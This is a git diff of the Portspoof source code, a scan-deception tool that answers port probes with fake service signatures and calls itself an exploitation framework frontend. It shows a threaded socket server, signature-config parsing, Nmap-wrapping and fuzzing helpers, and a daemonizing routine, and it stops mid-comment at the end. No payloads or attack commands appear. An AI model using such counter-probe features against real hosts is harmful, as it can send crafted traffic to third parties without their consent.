uninstall-am: uninstall-binPROGRAMS mostlyclean-compile mostlyclean-generic pdf pdf-am ps ps-am \ tags uninstall uninstall-am uninstall-binPROGRAMS + # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: diff --git a/src/portspoof.h b/src/Portspoof.cpp old mode 100644 new mode 100755 similarity index 61% rename from src/portspoof.h rename to src/Portspoof.cpp index 76bd804..d1a4cb1 --- a/src/portspoof.h +++ b/src/Portspoof.cpp @@ -1,6 +1,6 @@ /* - * portspoof Service signature obfucastor - * Copyright (C) 12012 Piotr Duszyński + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the @@ -16,34 +16,50 @@ * with this program; if not, see . * * Linking portspoof statically or dynamically with other modules is making - * a combined work based on portspoof. Thus, the terms and conditions of + * a combined work based on Portspoof. Thus, the terms and conditions of * the GNU General Public License cover the whole combination. * - * In addition, as a special exception, the copyright holder of portspoof - * gives you permission to combine portspoof with free software programs or + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or * libraries that are released under the GNU LGPL. You may copy * and distribute such a system following the terms of the GNU GPL for - * portspoof and the licenses of the other code concerned. + * Portspoof and the licenses of the other code concerned. * - * Note that people who make modified versions of portspoof are not obligated + * Note that people who make modified versions of Portspoof are not obligated * to grant this special exception for their modified versions; it is their * choice whether to do so. The GNU General Public License gives permission * to release a modified version without this exception; this exception * also makes it possible to release a modified version which carries * forward this exception. */ -#define OPT_IP 1<<1 -#define OPT_PORT 1<<2 -#define OPT_DEBUG 1<<3 -#define OPT_SIG_FILE 1<<4 -#define OPT_LOG_FILE 1<<5 -#define OPT_SYSLOG_DIS 1<<6 -#define OPT_CONFIG_FILE 1<<7 -#define CONFSEPARATOR "/" -#define DEFAULT_PORT 4444 -#define LOG_FILE "portspoof.log" -#define CONF_FILE "portspoof.conf" -#define SIGNATURE_FILE "signatures" -extern char opts; -extern char* log_file; \ No newline at end of file + +#include "Server.h" +#include "Configuration.h" +#include "Threads.h" + + +#include "revregex.h" +#include "connection.h" + +Configuration* configuration; + +int main(int argc, char **argv) +{ + + Server* server; + + configuration = new Configuration(); + + if(configuration->processArgs(argc,argv)) + exit(1); + + + if(configuration->getConfigValue(OPT_RUN_AS_D)) + Utils::daemonize(configuration); + + server = new Server(configuration); + server->run(); + + return 0; +} diff --git a/src/Server.cpp b/src/Server.cpp new file mode 100755 index 0000000..f1a4b71 --- /dev/null +++ b/src/Server.cpp @@ -0,0 +1,179 @@ +/* + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation; either version 2 of the License, or (at your + * option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program; if not, see . + * + * Linking portspoof statically or dynamically with other modules is making + * a combined work based on Portspoof. Thus, the terms and conditions of + * the GNU General Public License cover the whole combination. + * + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or + * libraries that are released under the GNU LGPL. You may copy + * and distribute such a system following the terms of the GNU GPL for + * Portspoof and the licenses of the other code concerned. + * + * Note that people who make modified versions of Portspoof are not obligated + * to grant this special exception for their modified versions; it is their + * choice whether to do so. The GNU General Public License gives permission + * to release a modified version without this exception; this exception + * also makes it possible to release a modified version which carries + * forward this exception. + */ + + +#include "Server.h" + +pthread_cond_t new_connection_cond = PTHREAD_COND_INITIALIZER; +pthread_mutex_t new_connection_mutex = PTHREAD_MUTEX_INITIALIZER; + +Thread threads[MAX_THREADS]; + +Server::Server(Configuration* configuration) +{ + this->configuration = configuration; + + /* create thread pool */ + for(int i = 0; i < this->configuration->getThreadNr(); i++) + { + pthread_create(&threads[i].tid, NULL, &process_connection, (void *) i); + threads[i].client_count = 0; + } + + /* create a socket */ + sockd = socket(PF_INET, SOCK_STREAM, 0); + if (sockd == -1) + { + perror("Socket creation error"); + exit(1); + } + + int n = 1; + setsockopt(sockd, SOL_SOCKET, SO_REUSEADDR , &n, sizeof(n)); + + /* server address - by default localhost */ + my_name.sin_family = PF_INET; + if(configuration->getConfigValue(OPT_IP)) + { + fprintf(stdout,"-> Binding to iface: %s\n",configuration->getBindIP().c_str()); + inet_aton(configuration->getBindIP().c_str(), &my_name.sin_addr); + + } + else + my_name.sin_addr.s_addr = INADDR_ANY; + + if(configuration->getConfigValue(OPT_PORT)) + { + fprintf(stdout,"-> Binding to port: %d\n",configuration->getPort()); + my_name.sin_port = htons(configuration->getPort()); + + } + else + my_name.sin_port = htons(DEFAULT_PORT); + + status = bind(sockd, (struct sockaddr*)&my_name, sizeof(my_name)); + if (status == -1) + { + perror("Binding error"); + exit(1); + } + + // Set queue sizeof + status = listen(sockd, 10); + if (status == -1) + { + perror("Listen set error"); + exit(1); + } + + return; +} + + +bool Server::run() +{ + +int choosen; + + while(1) + { + /* wait for a connection */ + addrlen = sizeof(peer_name); + newsockfd = accept(sockd, (struct sockaddr*)&peer_name,(socklen_t*) &addrlen); + + + if (newsockfd < 0) + perror("ERROR on accept"); + else{ + + nonblock(newsockfd); + + start: + pthread_mutex_lock(&new_connection_mutex); + choosen=choose_thread(); + + + if( choosen == -1) + { + pthread_mutex_unlock(&new_connection_mutex); + sleep(1); + goto start; + } + + + if(configuration->getConfigValue(OPT_DEBUG)) + fprintf(stdout," new conn - thread choosen: %d - nr. of connections already in queue: %d\n",choosen,threads[choosen].client_count); + fflush(stdout); + + for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++) + { + if(threads[choosen].clients[i] == 0) + { + threads[choosen].clients[i] = newsockfd; + threads[choosen].client_count++; + break; + } + } + pthread_mutex_unlock(&new_connection_mutex); + } + + + } + +return 0; + +} + +int Server::choose_thread() +{ + int i=this->configuration->getThreadNr()-1; + int min = i; + while(i >=0) + { + if(threads[i].client_count < threads[min].client_count) + { + min = i; + } + i--; + } + + if(threads[min].client_count==MAX_CLIENT_PER_THREAD) + return -1; + + return min; +} + + + diff --git a/src/Server.h b/src/Server.h new file mode 100755 index 0000000..34fa8cc --- /dev/null +++ b/src/Server.h @@ -0,0 +1,78 @@ +/* + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation; either version 2 of the License, or (at your + * option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program; if not, see . + * + * Linking portspoof statically or dynamically with other modules is making + * a combined work based on Portspoof. Thus, the terms and conditions of + * the GNU General Public License cover the whole combination. + * + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or + * libraries that are released under the GNU LGPL. You may copy + * and distribute such a system following the terms of the GNU GPL for + * Portspoof and the licenses of the other code concerned. + * + * Note that people who make modified versions of Portspoof are not obligated + * to grant this special exception for their modified versions; it is their + * choice whether to do so. The GNU General Public License gives permission + * to release a modified version without this exception; this exception + * also makes it possible to release a modified version which carries + * forward this exception. + */ + + +#ifndef SERVER_H +#define SERVER_H + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include "Threads.h" +#include "Configuration.h" + +#include "connection.h" + + +using namespace std; + +class Server{ + + private: + int sockd,newsockfd; + int addrlen; + struct sockaddr_in my_name, peer_name; + int status; + + Configuration* configuration; + + public: + Server(Configuration* configuration); + int choose_thread(); + bool run(); +}; + +#endif + diff --git a/src/threads.h b/src/Threads.h old mode 100644 new mode 100755 similarity index 77% rename from src/threads.h rename to src/Threads.h index 3175328..963d10d --- a/src/threads.h +++ b/src/Threads.h @@ -1,6 +1,6 @@ /* - * portspoof Service signature obfucastor - * Copyright (C) 12012 Piotr Duszyński + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the @@ -16,16 +16,16 @@ * with this program; if not, see . * * Linking portspoof statically or dynamically with other modules is making - * a combined work based on portspoof. Thus, the terms and conditions of + * a combined work based on Portspoof. Thus, the terms and conditions of * the GNU General Public License cover the whole combination. * - * In addition, as a special exception, the copyright holder of portspoof - * gives you permission to combine portspoof with free software programs or + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or * libraries that are released under the GNU LGPL. You may copy * and distribute such a system following the terms of the GNU GPL for - * portspoof and the licenses of the other code concerned. + * Portspoof and the licenses of the other code concerned. * - * Note that people who make modified versions of portspoof are not obligated + * Note that people who make modified versions of Portspoof are not obligated * to grant this special exception for their modified versions; it is their * choice whether to do so. The GNU General Public License gives permission * to release a modified version without this exception; this exception @@ -33,14 +33,9 @@ * forward this exception. */ + #include - -extern pthread_cond_t new_connection_cond; -extern pthread_mutex_t new_connection_mutex; - - - #ifndef THREAD_VARS #define THREAD_VARS diff --git a/src/Utils.cpp b/src/Utils.cpp new file mode 100755 index 0000000..919fb00 --- /dev/null +++ b/src/Utils.cpp @@ -0,0 +1,322 @@ +/* + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation; either version 2 of the License, or (at your + * option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program; if not, see . + * + * Linking portspoof statically or dynamically with other modules is making + * a combined work based on Portspoof. Thus, the terms and conditions of + * the GNU General Public License cover the whole combination. + * + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or + * libraries that are released under the GNU LGPL. You may copy + * and distribute such a system following the terms of the GNU GPL for + * Portspoof and the licenses of the other code concerned. + * + * Note that people who make modified versions of Portspoof are not obligated + * to grant this special exception for their modified versions; it is their + * choice whether to do so. The GNU General Public License gives permission + * to release a modified version without this exception; this exception + * also makes it possible to release a modified version which carries + * forward this exception. + */ + + + +#include "Utils.h" + + +pthread_cond_t log_cond = PTHREAD_COND_INITIALIZER; +pthread_mutex_t log_mutex = PTHREAD_MUTEX_INITIALIZER; + + +void Utils::hexdump(void *mem, unsigned int len) +{ + unsigned int i, j; + + for(i = 0; i < len + ((len % HEXDUMP_COLS) ? (HEXDUMP_COLS - len % HEXDUMP_COLS) : 0); i++) + { + /* print offset */ + if(i % HEXDUMP_COLS == 0) + { + fprintf(stdout,"0x%06x: ", i); + } + + /* print hex data */ + if(i < len) + { + fprintf(stdout,"%02x ", 0xFF & ((char*)mem)[i]); + } + else /* end of block, just aligning for ASCII dump */ + { + fprintf(stdout," "); + } + + /* print ASCII dump */ + if(i % HEXDUMP_COLS == (HEXDUMP_COLS - 1)) + { + for(j = i - (HEXDUMP_COLS - 1); j <= i; j++) + { + if(j >= len) /* end of block, not really printing */ + { + putchar(' '); + } + else if(isprint(((char*)mem)[j])) /* printable char */ + { + putchar(0xFF & ((char*)mem)[j]); + } + else /* other char */ + { + putchar('.'); + } + } + putchar('\n'); + } + } +} + +std::vector Utils::wrapNMAP(string wrapper,std::vector payload) +{ + stringstream ss; + string str; + std::vector result_vector; + + ss< Utils::str2vector( std::string& s) +{ + std::vector result_vector; + + for(int i=0; i Utils::unescape(std::vector & s) +{ + std::vector res; + vector::const_iterator it = s.begin(); + while (it != s.end()) + { + char c = *it++; + if (c == '\\' && it != s.end()) + { + switch (*it++) { + case 'n': c = '\n'; break; + case 'r': c = '\r'; break; + case 't': c = '\t'; break; + + // all other escapes + default: + // invalid escape sequence - skip it. alternatively you can copy it as is, throw an exception... + continue; + } + } + res.push_back(c); + } + + return res; +} + + +char * Utils::get_substring_value(char* str) +{ + int i=0; + int soffset=-1,eoffset=-1; + for(i;igetConfigValue(OPT_LOG_FILE)) + { + FILE *fp = fopen(configuration->getLogFile().c_str(), "a"); + if (fp == NULL) { + fprintf(stdout,"Error opening file: %s \n",configuration->getLogFile().c_str()); + exit(1); + } + + fprintf(fp,"%s",msg); + fclose(fp); + + } + + if(!(configuration->getConfigValue(OPT_SYSLOG_DIS))) + { + openlog(SYSLOG_NAME, LOG_PID|LOG_CONS, LOG_USER); + syslog(LOG_INFO," %s",msg); + closelog(); + } + pthread_mutex_unlock(&log_mutex); + + return; + +} + + +void Utils::daemonize(Configuration* configuration) +{ + + const string &dir = "/"; + const std::string &stdinfile = "/dev/null"; + const std::string &stdoutfile = "/dev/null"; + const std::string &stderrfile = "/dev/null"; + + + umask(0); + + + rlimit rl; + if (getrlimit(RLIMIT_NOFILE, &rl) < 0) + { + throw std::runtime_error(strerror(errno)); + } + + + + pid_t pid; + if ((pid = fork()) < 0) + { + throw std::runtime_error(strerror(errno)); + } else if (pid != 0) { //parent + exit(0); + } + + + setsid(); + + if (!dir.empty() && chdir(dir.c_str()) < 0) + { + throw std::runtime_error(strerror(errno)); + } + + + if (setgid(configuration->getGroupid()) != 0) + { + fprintf(stdout,"setgid: Unable to drop group privileges: %s", strerror(errno)); + fflush(stdout); + exit(-1); + } + + + if (setuid(configuration->getUserid()) != 0) + { + fprintf(stdout,"setuid: Unable to drop user privileges: %s", strerror(errno)); + fflush(stdout); + exit(-1); + } + + + + + if (rl.rlim_max == RLIM_INFINITY) + { + rl.rlim_max = 1024; + } + + for (unsigned int i = 0; i < rl.rlim_max; i++) + { + close(i); + } + + + + int fd0 = open(stdinfile.c_str(), O_RDONLY); + int fd1 = open(stdoutfile.c_str(), + O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR); + int fd2 = open(stderrfile.c_str(), + O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR); + + + if (fd0 != STDIN_FILENO || fd1 != STDOUT_FILENO || fd2 != STDERR_FILENO) + { + throw runtime_error("new standard file descriptors were not opened as expected"); + } + + + +} \ No newline at end of file diff --git a/src/Utils.h b/src/Utils.h new file mode 100755 index 0000000..63926c7 --- /dev/null +++ b/src/Utils.h @@ -0,0 +1,91 @@ +/* + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation; either version 2 of the License, or (at your + * option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program; if not, see . + * + * Linking portspoof statically or dynamically with other modules is making + * a combined work based on Portspoof. Thus, the terms and conditions of + * the GNU General Public License cover the whole combination. + * + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or + * libraries that are released under the GNU LGPL. You may copy + * and distribute such a system following the terms of the GNU GPL for + * Portspoof and the licenses of the other code concerned. + * + * Note that people who make modified versions of Portspoof are not obligated + * to grant this special exception for their modified versions; it is their + * choice whether to do so. The GNU General Public License gives permission + * to release a modified version without this exception; this exception + * also makes it possible to release a modified version which carries + * forward this exception. + */ + + + +#ifndef UTILS_H +#define UTILS_H + + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "Configuration.h" + +class Configuration; +extern Configuration* configuration; + +#ifndef HEXDUMP_COLS +#define HEXDUMP_COLS 16 +#endif + +#define MAX_LOG_MSG_LEN 200 +#define SYSLOG_NAME "portspoof" +#define FUZZING_KEYWORD "__FUZZ__" + +using namespace std; + +class Utils { + + public: + + static void hexdump(void *mem, unsigned int len); + static int isNumeric (const char * s); + static char* get_substring_value(char* str); + static std::vector wrapNMAP(string wrapper,std::vector payload); + static std::vector unescape( std::vector& s); + static std::vector str2vector( std::string& s); + static void log_create(const char* file); + static void log_write(Configuration* configuration,const char* msg); + static void daemonize(Configuration* configuration); + + + +}; + + +#endif + diff --git a/src/config.h.in b/src/config.h.in index 3800282..dcd4c6d 100644 --- a/src/config.h.in +++ b/src/config.h.in @@ -73,9 +73,6 @@ /* Define to 1 if your C compiler doesn't accept -c and -o together. */ #undef NO_MINUS_C_MINUS_O -/* This is an OpenBSD system */ -#undef OPENBSD - /* Name of package */ #undef PACKAGE @@ -91,12 +88,12 @@ /* Define to the one symbol short name of this package. */ #undef PACKAGE_TARNAME +/* Define to the home page for this package. */ +#undef PACKAGE_URL + /* Define to the version of this package. */ #undef PACKAGE_VERSION -/* This is a BSD system */ -#undef SOMEBSD - /* Define to 1 if you have the ANSI C header files. */ #undef STDC_HEADERS diff --git a/src/config_file.c b/src/config_file.c deleted file mode 100644 index 2f8c51c..0000000 --- a/src/config_file.c +++ /dev/null @@ -1,163 +0,0 @@ -#include "config_file.h" - -int isNumeric (const char * s) -{ - if (s == NULL || *s == '\0' || isspace(*s)) - return 0; - char * p; - strtod(s, &p); - return *p == '\0'; -} - -char * get_substring_value(char* str) -{ - int i=0; - int soffset=-1,eoffset=-1; - for(i;i1 && tmp[0]!='#') - { - - if(sscanf(tmp, "%s %s",str1,str2)==EOF){ - printf("Error in configuration file"); - exit(1); - } - - if(str1==NULL || str2==NULL) - { - printf("Error in configuration file"); - exit(1); - } - nr_of_payloads++; - } - - fclose(fp); - - return nr_of_payloads; -} - -int process_config_file(struct signature **arr_lines2,int* signatures,int num_lines, char* config_file) -{ - - FILE *fp = fopen(config_file, "r"); - if (fp == NULL) { - printf("Error opening file: %s \n",config_file); - exit(1); - } - - char tmp[BUFSIZE], str1[BUFSIZE], str2[BUFSIZE]; - int i=0,lp,hp; - char* substr; - int len; - - while (fgets(tmp, BUFSIZE, fp)) - if (strlen(tmp) >1 && tmp[0]!='#') - { - - if(sscanf(tmp, "%s %s",(char *)str1,str2)==EOF){ - printf("Error in configuration file"); - exit(1); - } - - if(str1==NULL || str2==NULL) - { - printf("Error in configuration file"); - exit(1); - } - - if(isNumeric(str1)) //single port - { - sscanf(str1,"%d",&lp); - substr=get_substring_value(tmp); - //DEBUG - //printf("port %d value: %s\n",lp,substr); - len=strlen(substr); - ((signature*)(arr_lines2[num_lines+i-1]))->cptr=process_signature(substr,&len);; - ((signature*)(arr_lines2[num_lines+i-1]))->len=len; - - - signatures[lp]=num_lines+i-1; - i++; - continue; - } - else - { - if(sscanf(str1, "%d-%d",&lp,&hp)==EOF){ - printf("Error in configuration file\n"); - exit(1); - } - - if(lp==0 || hp==0) - { - printf("Error in configuration file"); - exit(1); - } - - substr=get_substring_value(tmp); - //DEBUG - //printf("range port %d-%d value: %s\n",lp,hp,substr); - - len=strlen(substr); - ((signature*)(arr_lines2[num_lines+i-1]))->cptr=process_signature(substr,&len);; - ((signature*)(arr_lines2[num_lines+i-1]))->len=len; - - int port=lp; - for(port;port<=hp;port++) - { - signatures[port]=num_lines+i-1; - } - - i++; - continue; - - } - - } - - fclose(fp); - return 0; -} \ No newline at end of file diff --git a/src/config_file.h b/src/config_file.h deleted file mode 100644 index ca5be7d..0000000 --- a/src/config_file.h +++ /dev/null @@ -1,9 +0,0 @@ -#include -#include - -#include "revregex.h" -#include "connection.h" - -int process_config_file(struct signature **arr_lines2,int* signatures,int num_lines, char* config_file); -char *get_substring_value(char* str); -int get_nr_of_payloads(char* config_file); diff --git a/src/connection.c b/src/connection.c deleted file mode 100644 index 4212e00..0000000 --- a/src/connection.c +++ /dev/null @@ -1,441 +0,0 @@ -/* - * portspoof Service signature obfucastor - * Copyright (C) 12012 Piotr Duszyński - * - * This program is free software; you can redistribute it and/or modify it - * under the terms of the GNU General Public License as published by the - * Free Software Foundation; either version 2 of the License, or (at your - * option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. - * See the GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License along - * with this program; if not, see . - * - * Linking portspoof statically or dynamically with other modules is making - * a combined work based on portspoof. Thus, the terms and conditions of - * the GNU General Public License cover the whole combination. - * - * In addition, as a special exception, the copyright holder of portspoof - * gives you permission to combine portspoof with free software programs or - * libraries that are released under the GNU LGPL. You may copy - * and distribute such a system following the terms of the GNU GPL for - * portspoof and the licenses of the other code concerned. - * - * Note that people who make modified versions of portspoof are not obligated - * to grant this special exception for their modified versions; it is their - * choice whether to do so. The GNU General Public License gives permission - * to release a modified version without this exception; this exception - * also makes it possible to release a modified version which carries - * forward this exception. - */ - - - -#include -#include -#include -#include -#include -#include - -#ifdef OPENBSD - - -#include -#include -#include -#include -#include -#include -#include -#include - -#endif - -#include "config.h" -#include "threads.h" -#include "connection.h" -#include "portspoof.h" -#include "log.h" - - -Thread threads[MAX_THREADS]; - - -#ifdef OPENBSD - -#include -#include -#include -#include -#include -#include -#include -#include - - -void -print_host(struct pf_addr *addr, u_int16_t port, sa_family_t af, u_int16_t rdom) -{ - int opts=0; - char buf[48]; - - - if (inet_ntop(AF_INET, addr, buf, sizeof(buf)) == 0) - printf("?"); - else - printf("%s", buf); - - if (port) { - if (af == AF_INET) - printf(":%u", ntohs(port)); - else - printf("[%u]", ntohs(port)); - } - -} - - -int print_state(struct pfsync_state *s) -{ - - - struct pfsync_state_peer *src, *dst; - struct pfsync_state_key *sk, *nk; - struct protoent *p; - int min, sec; - int afto = (s->key[PF_SK_STACK].af != s->key[PF_SK_WIRE].af); - int idx; - int ret=0; - - src = &s->dst; - dst = &s->src; - sk = &s->key[PF_SK_WIRE]; - nk = &s->key[PF_SK_STACK]; - - /* - printf("%s ", s->ifname); - if ((p = getprotobynumber(s->proto)) != NULL) - printf("%s ", p->p_name); - else - printf("%u ", s->proto); - - print_host(&nk->addr[1], nk->port[1], nk->af, nk->rdomain); - */ - - if (nk->af != sk->af || PF_ANEQ(&nk->addr[1], &sk->addr[1], nk->af) || - nk->port[1] != sk->port[1] || - nk->rdomain != sk->rdomain) { - idx = afto ? 0 : 1; - printf(" ("); - print_host(&sk->addr[idx], sk->port[idx], sk->af, - sk->rdomain); - printf(")"); - ret=sk->port[idx]; - } - - /* - if (s->direction == PF_OUT || (afto && s->direction == PF_IN)) - printf(" -> "); - else - printf(" <- "); - - */ - - print_host(&nk->addr[0], nk->port[0], nk->af, nk->rdomain); - - /*printf(" "); - if (s->proto == IPPROTO_TCP) { - if (src->state <= TCPS_TIME_WAIT && - dst->state <= TCPS_TIME_WAIT) - //printf(" %s:%s\n", tcpstates[src->state],tcpstates[dst->state]); - } - */ - return ret; -} - -int get_original_port(struct in_addr sip, u_int16_t sport) -{ - - struct pfsync_state_peer *src, *dst; - struct pfsync_state_key *sk, *nk; - - char *pf_device = "/dev/pf"; - int mode = O_RDONLY; - int dev = open(pf_device,mode); - if (dev == -1) - exit(1); - - struct pfioc_states ps; - struct pfsync_state *p; - char *inbuf = NULL, *newinbuf = NULL; - unsigned int len = 0; - int i; - - memset(&ps, 0, sizeof(ps)); - for (;;) { - ps.ps_len = len; - if (len) { - newinbuf = realloc(inbuf, len); - if (newinbuf == NULL) - err(1, "realloc"); - ps.ps_buf = inbuf = newinbuf; - } - - if (ioctl(dev, DIOCGETSTATES, &ps) < 0) { - warn("DIOCGETSTATES"); - free(inbuf); - return (-1); - } - if (ps.ps_len + sizeof(struct pfioc_states) < len) - break; - if (len == 0 && ps.ps_len == 0) - goto done; - if (len == 0 && ps.ps_len != 0) - len = ps.ps_len; - if (ps.ps_len == 0) - goto done; - len *= 2; - } - - p = ps.ps_states; - for (i = 0; i < ps.ps_len; i += sizeof(*p), p++) { - if ( p->proto == IPPROTO_TCP && p->direction == PF_IN) - { - src = &p->dst; - dst = &p->src; - sk = &p->key[PF_SK_WIRE]; - nk = &p->key[PF_SK_STACK]; - u_int16_t state_port=nk->port[0]; - - //DEBUG - - if(memcmp(&sip,&nk->addr[0],sizeof(int)) ==0 && state_port == sport){ - close(*pf_device); - return print_state(p); - } - - } - } -done: - close(*pf_device); - free(inbuf); - return (0); -} - -#endif - - -void nonblock(int sockfd) -{ - int opts; - opts = fcntl(sockfd, F_GETFL); - if(opts < 0) - { - perror("fcntl(F_GETFL)\n"); - exit(1); - } - opts = (opts | O_NONBLOCK); - if(fcntl(sockfd, F_SETFL, opts) < 0) - { - perror("fcntl(F_SETFL)\n"); - exit(1); - } -} - -void process_connection(void *arg) -{ - int tid = (int) arg; - int len,i; - char* str; - char buffer; - int original_port=DEFAULT_PORT; - int n = 0; - time_t timestamp; - struct sockaddr_in peer_sockaddr; - int peer_sockaddr_len=sizeof(struct sockaddr_in); - - while(1) { - - sleep(1); - for(i = 0; i < MAX_CLIENT_PER_THREAD; i++) - { - - if(threads[tid].clients[i] != 0) - { - - timestamp = time(NULL); - - n = recv(threads[tid].clients[i], &buffer,1, 0); - - // deal with different recv buffer size - if(n == 0){ - - #ifdef OPENBSD - - if ( getpeername(threads[tid].clients[i], (struct sockaddr *) &peer_sockaddr, &peer_sockaddr_len)){ - perror("Getsockopt failed"); - goto close_socket; - } - else - original_port=get_original_port(peer_sockaddr.sin_addr,peer_sockaddr.sin_port); - - #else - - if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr, &peer_sockaddr_len )){ - perror("Getsockopt failed"); - goto close_socket; - } - else - original_port = ntohs(peer_sockaddr.sin_port); - - #endif - - //LOG - char* msg=malloc(MAX_LOG_MSG_LEN); - memset(msg,0,MAX_LOG_MSG_LEN); - snprintf(msg,MAX_LOG_MSG_LEN,"%d # Port_probe # REMOVING_SOCKET # source_ip:%s # dst_port:%d \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,; - log_write(msg); - free(msg); - // - - close_socket: - if(opts & OPT_DEBUG) - fprintf(stderr,"Thread nr. %d : client %d closed connection\n",tid, threads[tid].clients[i]); - - close(threads[tid].clients[i]); - - pthread_mutex_lock(&new_connection_mutex); - threads[tid].clients[i] = 0; - threads[tid].client_count--; - pthread_mutex_unlock(&new_connection_mutex); - - - } - else if(n < 0){ - - - if(errno == EAGAIN) - { - continue; // Nmap NULL probe (no data) -> skip && go to another socket (client) - } - else if(errno == 104) // Client terminted connection -> get rid of the socket now! - {} - else - fprintf(stderr,"errno: %d\n", errno); - - #ifdef OPENBSD - - if ( getpeername(threads[tid].clients[i], (struct sockaddr *) &peer_sockaddr, &peer_sockaddr_len)){ - perror("Getsockopt failed"); - goto close_socket2; - } - else - original_port=get_original_port(peer_sockaddr.sin_addr,peer_sockaddr.sin_port); - - #else - - if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr, &peer_sockaddr_len )){ - perror("Getsockopt failed"); - goto close_socket2; - } - else - original_port = ntohs(peer_sockaddr.sin_port); - - #endif - - //LOG - char* msg=malloc(MAX_LOG_MSG_LEN); - memset(msg,0,MAX_LOG_MSG_LEN); - snprintf(msg,MAX_LOG_MSG_LEN,"%d # Port_probe # REMOVING_SOCKET # source_ip:%s # dst_port:%d \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,; - log_write(msg); - free(msg); - // - - close_socket2: - close(threads[tid].clients[i]); - - pthread_mutex_lock(&new_connection_mutex); - threads[tid].clients[i] = 0; - threads[tid].client_count--; - pthread_mutex_unlock(&new_connection_mutex); - - } - else - { - - - #ifdef OPENBSD - // BSD - getpeername(threads[tid].clients[i], (struct sockaddr *) &peer_sockaddr, &peer_sockaddr_len); - original_port=get_original_port(peer_sockaddr.sin_addr,peer_sockaddr.sin_port); - // - #else - // Linux - if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr, &peer_sockaddr_len )) - perror("Getsockopt failed"); - original_port = ntohs(peer_sockaddr.sin_port); - // - #endif - - //LOG - char* msg=malloc(MAX_LOG_MSG_LEN); - memset(msg,0,MAX_LOG_MSG_LEN); - snprintf(msg,MAX_LOG_MSG_LEN,"%d # Service_probe # SIGNATURE_SEND # source_ip:%s # dst_port:%d \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,; - log_write(msg); - free(msg); - // - - if(opts & OPT_DEBUG) - { - fprintf(stderr,"\n---\nThread nr.%d for port %d \n", tid,original_port); - } - - str=((signature*)(arr_lines2[signatures[original_port]]))->cptr; - len=((signature*)(arr_lines2[signatures[original_port]]))->len; - - if(opts & OPT_DEBUG) - { - fprintf(stderr,"signature sent -> "); - int t=0; - for(;t + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation; either version 2 of the License, or (at your + * option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program; if not, see . + * + * Linking portspoof statically or dynamically with other modules is making + * a combined work based on Portspoof. Thus, the terms and 